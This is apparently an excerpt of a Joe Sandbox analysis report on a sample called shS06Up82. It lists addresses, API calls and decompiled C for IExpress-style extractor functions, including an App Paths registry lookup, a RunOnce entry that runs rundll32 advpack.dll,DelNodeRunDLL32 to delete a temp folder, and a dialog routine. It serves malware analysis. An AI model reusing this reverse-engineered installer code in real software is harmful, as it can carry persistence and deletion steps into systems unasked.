                                                                                                                                                                                                      0x003e424c
                                                                                                                                                                                                      0x003e4252
                                                                                                                                                                                                      0x003e4257
                                                                                                                                                                                                      0x003e43a4
                                                                                                                                                                                                      0x003e43a5
                                                                                                                                                                                                      0x003e43ab
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e43ab
                                                                                                                                                                                                      0x003e4263
                                                                                                                                                                                                      0x003e4269
                                                                                                                                                                                                      0x003e426e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e427a
                                                                                                                                                                                                      0x003e4280
                                                                                                                                                                                                      0x003e4285
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e428d
                                                                                                                                                                                                      0x003e4293
                                                                                                                                                                                                      0x003e42e6
                                                                                                                                                                                                      0x003e42e9
                                                                                                                                                                                                      0x003e42ef
                                                                                                                                                                                                      0x003e42f4
                                                                                                                                                                                                      0x003e42f7
                                                                                                                                                                                                      0x003e4300
                                                                                                                                                                                                      0x003e4307
                                                                                                                                                                                                      0x003e430e
                                                                                                                                                                                                      0x003e4315
                                                                                                                                                                                                      0x003e431c
                                                                                                                                                                                                      0x003e4322
                                                                                                                                                                                                      0x003e4326
                                                                                                                                                                                                      0x003e432d
                                                                                                                                                                                                      0x003e432d
                                                                                                                                                                                                      0x003e432f
                                                                                                                                                                                                      0x003e4334
                                                                                                                                                                                                      0x003e4343
                                                                                                                                                                                                      0x003e4349
                                                                                                                                                                                                      0x003e434d
                                                                                                                                                                                                      0x003e4354
                                                                                                                                                                                                      0x003e4354
                                                                                                                                                                                                      0x003e435d
                                                                                                                                                                                                      0x003e436e
                                                                                                                                                                                                      0x003e436e
                                                                                                                                                                                                      0x003e437d
                                                                                                                                                                                                      0x003e4383
                                                                                                                                                                                                      0x003e4387
                                                                                                                                                                                                      0x003e438e
                                                                                                                                                                                                      0x003e438e
                                                                                                                                                                                                      0x003e4387
                                                                                                                                                                                                      0x003e4391
                                                                                                                                                                                                      0x003e4399
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e4295
                                                                                                                                                                                                      0x003e429f
                                                                                                                                                                                                      0x003e42a5
                                                                                                                                                                                                      0x003e42aa
                                                                                                                                                                                                      0x003e42aa
                                                                                                                                                                                                      0x003e42ad
                                                                                                                                                                                                      0x003e42ad
                                                                                                                                                                                                      0x003e42af
                                                                                                                                                                                                      0x003e42b0
                                                                                                                                                                                                      0x003e42b6
                                                                                                                                                                                                      0x003e42c2
                                                                                                                                                                                                      0x003e42c8
                                                                                                                                                                                                      0x003e42ce
                                                                                                                                                                                                      0x003e42e4
                                                                                                                                                                                                      0x003e42e4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e42ce

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 003E4236
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 003E424C
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,000000C3), ref: 003E4263
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 003E427A
                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,003E88C0,?,00000001), ref: 003E429F
                                                                                                                                                                                                      • CharPrevA.USER32(003E88C0,007D1181,?,00000001), ref: 003E42C2
                                                                                                                                                                                                      • CharPrevA.USER32(003E88C0,00000000,?,00000001), ref: 003E42D6
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 003E4391
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 003E43A5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                      • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                      • API String ID: 1865808269-1731843650
                                                                                                                                                                                                      • Opcode ID: 100f6a991e1a37f4057fccc3f25983a11e252f731ee0c2751efaf27c9e15c072
                                                                                                                                                                                                      • Instruction ID: 007546da3fa17b389a7d931d7da2b4b453afb0f3aa7f46a17e199cde0425e3c8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 100f6a991e1a37f4057fccc3f25983a11e252f731ee0c2751efaf27c9e15c072
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8341E778E002E4AFD7239F66DC84AAE7BB8EB49344F050759E9456B2D1CB758C01C762
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E003E2773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				char _v269;
                                                                                                                                                                                                      				CHAR* _v276;
                                                                                                                                                                                                      				int _v280;
                                                                                                                                                                                                      				void* _v284;
                                                                                                                                                                                                      				int _v288;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t23;
                                                                                                                                                                                                      				intOrPtr _t34;
                                                                                                                                                                                                      				int _t45;
                                                                                                                                                                                                      				int* _t50;
                                                                                                                                                                                                      				CHAR* _t52;
                                                                                                                                                                                                      				CHAR* _t61;
                                                                                                                                                                                                      				char* _t62;
                                                                                                                                                                                                      				int _t63;
                                                                                                                                                                                                      				CHAR* _t64;
                                                                                                                                                                                                      				signed int _t65;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t52 = __ecx;
                                                                                                                                                                                                      				_t23 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                      				_t62 = _a4;
                                                                                                                                                                                                      				_t50 = 0;
                                                                                                                                                                                                      				_t61 = __ecx;
                                                                                                                                                                                                      				_v276 = _t62;
                                                                                                                                                                                                      				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                      				if( *_t62 != 0x23) {
                                                                                                                                                                                                      					_t63 = 0x104;
                                                                                                                                                                                                      					goto L14;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t64 = _t62 + 1;
                                                                                                                                                                                                      					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                      					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                      					_t63 = 0x104;
                                                                                                                                                                                                      					_t34 = _v269;
                                                                                                                                                                                                      					if(_t34 == 0x53) {
                                                                                                                                                                                                      						L14:
                                                                                                                                                                                                      						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                      						goto L15;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if(_t34 == 0x57) {
                                                                                                                                                                                                      							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_push(_t52);
                                                                                                                                                                                                      							_v288 = 0x104;
                                                                                                                                                                                                      							E003E1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                      							_t59 = 0x104;
                                                                                                                                                                                                      							E003E658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                      							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                      								L16:
                                                                                                                                                                                                      								_t59 = _t63;
                                                                                                                                                                                                      								E003E658A(_t61, _t63, _v276);
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								if(RegQueryValueExA(_v284, 0x3e1140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                      									_t45 = _v280;
                                                                                                                                                                                                      									if(_t45 != 2) {
                                                                                                                                                                                                      										L9:
                                                                                                                                                                                                      										if(_t45 == 1) {
                                                                                                                                                                                                      											goto L10;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                      											_t45 = _v280;
                                                                                                                                                                                                      											goto L9;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t59 = 0x104;
                                                                                                                                                                                                      											E003E1680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                      											L10:
                                                                                                                                                                                                      											_t50 = 1;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								RegCloseKey(_v284);
                                                                                                                                                                                                      								L15:
                                                                                                                                                                                                      								if(_t50 == 0) {
                                                                                                                                                                                                      									goto L16;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E003E6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                      			}























                                                                                                                                                                                                      0x003e2773
                                                                                                                                                                                                      0x003e277e
                                                                                                                                                                                                      0x003e2785
                                                                                                                                                                                                      0x003e278a
                                                                                                                                                                                                      0x003e278d
                                                                                                                                                                                                      0x003e2790
                                                                                                                                                                                                      0x003e2792
                                                                                                                                                                                                      0x003e2798
                                                                                                                                                                                                      0x003e279d
                                                                                                                                                                                                      0x003e28b2
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e27a3
                                                                                                                                                                                                      0x003e27a3
                                                                                                                                                                                                      0x003e27af
                                                                                                                                                                                                      0x003e27c2
                                                                                                                                                                                                      0x003e27c8
                                                                                                                                                                                                      0x003e27cd
                                                                                                                                                                                                      0x003e27d5
                                                                                                                                                                                                      0x003e28b7
                                                                                                                                                                                                      0x003e28b9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e27db
                                                                                                                                                                                                      0x003e27dd
                                                                                                                                                                                                      0x003e28aa
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e27e3
                                                                                                                                                                                                      0x003e27e3
                                                                                                                                                                                                      0x003e27ec
                                                                                                                                                                                                      0x003e27f8
                                                                                                                                                                                                      0x003e2803
                                                                                                                                                                                                      0x003e280b
                                                                                                                                                                                                      0x003e2831
                                                                                                                                                                                                      0x003e28c3
                                                                                                                                                                                                      0x003e28c9
                                                                                                                                                                                                      0x003e28cd
                                                                                                                                                                                                      0x003e2837
                                                                                                                                                                                                      0x003e285a
                                                                                                                                                                                                      0x003e285c
                                                                                                                                                                                                      0x003e2865
                                                                                                                                                                                                      0x003e2892
                                                                                                                                                                                                      0x003e2895
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e2867
                                                                                                                                                                                                      0x003e2878
                                                                                                                                                                                                      0x003e288c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e287a
                                                                                                                                                                                                      0x003e2880
                                                                                                                                                                                                      0x003e2885
                                                                                                                                                                                                      0x003e2897
                                                                                                                                                                                                      0x003e2899
                                                                                                                                                                                                      0x003e2899
                                                                                                                                                                                                      0x003e2878
                                                                                                                                                                                                      0x003e2865
                                                                                                                                                                                                      0x003e28a0
                                                                                                                                                                                                      0x003e28bf
                                                                                                                                                                                                      0x003e28c1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e28c1
                                                                                                                                                                                                      0x003e2831
                                                                                                                                                                                                      0x003e27dd
                                                                                                                                                                                                      0x003e27d5
                                                                                                                                                                                                      0x003e28e5

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharUpperA.USER32(59D037E4,00000000,00000000,00000000), ref: 003E27A8
                                                                                                                                                                                                      • CharNextA.USER32(0000054D), ref: 003E27B5
                                                                                                                                                                                                      • CharNextA.USER32(00000000), ref: 003E27BC
                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003E2829
                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,003E1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003E2852
                                                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003E2870
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003E28A0
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 003E28AA
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 003E28B9
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 003E27E4
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                      • API String ID: 2659952014-2428544900
                                                                                                                                                                                                      • Opcode ID: a6d1c2a688df843c75e64867cf0593c669ec26431c5b8fba0a066e6823f23fd9
                                                                                                                                                                                                      • Instruction ID: c0b4d1fe715807daf67f85a1980b5561480273fd32f4208f7138fd47d211b853
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a6d1c2a688df843c75e64867cf0593c669ec26431c5b8fba0a066e6823f23fd9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2741D871A001BCAFDB269B569C85AFF77BCEF15700F0041A9F549D6180CB705E858FA1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 62%
                                                                                                                                                                                                      			E003E2267() {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				char _v836;
                                                                                                                                                                                                      				void* _v840;
                                                                                                                                                                                                      				int _v844;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t19;
                                                                                                                                                                                                      				intOrPtr _t33;
                                                                                                                                                                                                      				void* _t38;
                                                                                                                                                                                                      				intOrPtr* _t42;
                                                                                                                                                                                                      				void* _t45;
                                                                                                                                                                                                      				void* _t47;
                                                                                                                                                                                                      				void* _t49;
                                                                                                                                                                                                      				signed int _t51;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t19 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                      				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                      				if( *0x3e8530 != 0) {
                                                                                                                                                                                                      					_push(_t49);
                                                                                                                                                                                                      					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                      						_push(_t38);
                                                                                                                                                                                                      						_v844 = 0x238;
                                                                                                                                                                                                      						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                      							_push(_t47);
                                                                                                                                                                                                      							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                      							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                      								E003E658A( &_v268, 0x104, 0x3e1140);
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_push("C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                      							E003E171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                      							_t42 =  &_v836;
                                                                                                                                                                                                      							_t45 = _t42 + 1;
                                                                                                                                                                                                      							_pop(_t47);
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								_t33 =  *_t42;
                                                                                                                                                                                                      								_t42 = _t42 + 1;
                                                                                                                                                                                                      							} while (_t33 != 0);
                                                                                                                                                                                                      							RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                      						_pop(_t38);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_pop(_t49);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E003E6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                      			}



















                                                                                                                                                                                                      0x003e2272
                                                                                                                                                                                                      0x003e2277
                                                                                                                                                                                                      0x003e2279
                                                                                                                                                                                                      0x003e2283
                                                                                                                                                                                                      0x003e2289
                                                                                                                                                                                                      0x003e22ab
                                                                                                                                                                                                      0x003e22b1
                                                                                                                                                                                                      0x003e22c4
                                                                                                                                                                                                      0x003e22e0
                                                                                                                                                                                                      0x003e22e6
                                                                                                                                                                                                      0x003e22f5
                                                                                                                                                                                                      0x003e230d
                                                                                                                                                                                                      0x003e231c
                                                                                                                                                                                                      0x003e231c
                                                                                                                                                                                                      0x003e2321
                                                                                                                                                                                                      0x003e233a
                                                                                                                                                                                                      0x003e2342
                                                                                                                                                                                                      0x003e2348
                                                                                                                                                                                                      0x003e234b
                                                                                                                                                                                                      0x003e234c
                                                                                                                                                                                                      0x003e234c
                                                                                                                                                                                                      0x003e234e
                                                                                                                                                                                                      0x003e234f
                                                                                                                                                                                                      0x003e236e
                                                                                                                                                                                                      0x003e236e
                                                                                                                                                                                                      0x003e237a
                                                                                                                                                                                                      0x003e2380
                                                                                                                                                                                                      0x003e2380
                                                                                                                                                                                                      0x003e2381
                                                                                                                                                                                                      0x003e2381
                                                                                                                                                                                                      0x003e238f

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 003E22A3
                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 003E22D8
                                                                                                                                                                                                      • memset.MSVCRT ref: 003E22F5
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 003E2305
                                                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 003E236E
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 003E237A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 003E2321
                                                                                                                                                                                                      • wextract_cleanup1, xrefs: 003E227C, 003E22CD, 003E2363
                                                                                                                                                                                                      • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 003E232D
                                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 003E2299
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
                                                                                                                                                                                                      • API String ID: 3027380567-1226499438
                                                                                                                                                                                                      • Opcode ID: 3a4bad1751a664c49e2546ae1778977c56b7105f6d8dc2548f0686e4f59d8643
                                                                                                                                                                                                      • Instruction ID: 2cc18f41027bad7e27c2f430c304ce2aafcb59d837a9224b36daa1c97a7a8612
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3a4bad1751a664c49e2546ae1778977c56b7105f6d8dc2548f0686e4f59d8643
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2031B871A002686BDB339B52DC85FDB777CEB15740F0402A5F50D9A0D1DA716F48CE50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                                                                                      			E003E3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                      				void* _t8;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				void* _t15;
                                                                                                                                                                                                      				struct HWND__* _t16;
                                                                                                                                                                                                      				struct HWND__* _t33;
                                                                                                                                                                                                      				struct HWND__* _t34;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t8 = _a8 - 0xf;
                                                                                                                                                                                                      				if(_t8 == 0) {
                                                                                                                                                                                                      					if( *0x3e8590 == 0) {
                                                                                                                                                                                                      						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                      						 *0x3e8590 = 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L13:
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t11 = _t8 - 1;
                                                                                                                                                                                                      				if(_t11 == 0) {
                                                                                                                                                                                                      					L7:
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					L8:
                                                                                                                                                                                                      					EndDialog(_a4, ??);
                                                                                                                                                                                                      					L9:
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t15 = _t11 - 0x100;
                                                                                                                                                                                                      				if(_t15 == 0) {
                                                                                                                                                                                                      					_t16 = GetDesktopWindow();
                                                                                                                                                                                                      					_t33 = _a4;
                                                                                                                                                                                                      					E003E43D0(_t33, _t16);
                                                                                                                                                                                                      					SetDlgItemTextA(_t33, 0x834,  *0x3e8d4c);
                                                                                                                                                                                                      					SetWindowTextA(_t33, "cent");
                                                                                                                                                                                                      					SetForegroundWindow(_t33);
                                                                                                                                                                                                      					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                      					 *0x3e88b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                      					SetWindowLongA(_t34, 0xfffffffc, E003E30C0);
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t15 != 1) {
                                                                                                                                                                                                      					goto L13;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_a12 != 6) {
                                                                                                                                                                                                      					if(_a12 != 7) {
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L7;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push(1);
                                                                                                                                                                                                      				goto L8;
                                                                                                                                                                                                      			}









                                                                                                                                                                                                      0x003e3108
                                                                                                                                                                                                      0x003e310b
                                                                                                                                                                                                      0x003e31b7
                                                                                                                                                                                                      0x003e31ca
                                                                                                                                                                                                      0x003e31d0
                                                                                                                                                                                                      0x003e31d0
                                                                                                                                                                                                      0x003e31da
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e31da
                                                                                                                                                                                                      0x003e3111
                                                                                                                                                                                                      0x003e3114
                                                                                                                                                                                                      0x003e3136
                                                                                                                                                                                                      0x003e3136
                                                                                                                                                                                                      0x003e3138
                                                                                                                                                                                                      0x003e313b
                                                                                                                                                                                                      0x003e3141
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3143
                                                                                                                                                                                                      0x003e3116
                                                                                                                                                                                                      0x003e311b
                                                                                                                                                                                                      0x003e314b
                                                                                                                                                                                                      0x003e3151
                                                                                                                                                                                                      0x003e3158
                                                                                                                                                                                                      0x003e316a
                                                                                                                                                                                                      0x003e3176
                                                                                                                                                                                                      0x003e317d
                                                                                                                                                                                                      0x003e318b
                                                                                                                                                                                                      0x003e319e
                                                                                                                                                                                                      0x003e31a3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e31ad
                                                                                                                                                                                                      0x003e3120
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e312a
                                                                                                                                                                                                      0x003e3134
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3134
                                                                                                                                                                                                      0x003e312c
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EndDialog.USER32(?,00000000), ref: 003E313B
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 003E314B
                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,00000834), ref: 003E316A
                                                                                                                                                                                                      • SetWindowTextA.USER32(?,cent), ref: 003E3176
                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 003E317D
                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000834), ref: 003E3185
                                                                                                                                                                                                      • GetWindowLongA.USER32(00000000,000000FC), ref: 003E3190
                                                                                                                                                                                                      • SetWindowLongA.USER32(00000000,000000FC,003E30C0), ref: 003E31A3
                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 003E31CA
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                      • String ID: cent
                                                                                                                                                                                                      • API String ID: 3785188418-3940384054
                                                                                                                                                                                                      • Opcode ID: a542c95f7ffba4ab98a03c34b9db796308fff47ee6672f66548e764220037bdd
                                                                                                                                                                                                      • Instruction ID: 9467df76505e9ce7983c0b56263479ccef055476f3b76c7d80c1c4181a29ead5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a542c95f7ffba4ab98a03c34b9db796308fff47ee6672f66548e764220037bdd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6711B4316046E1FBDB336F259C4CBAA3A6CEB4A721F110718F925AA1E0DB70A641D742
                                                                                                                                                                                                      Uniqueness

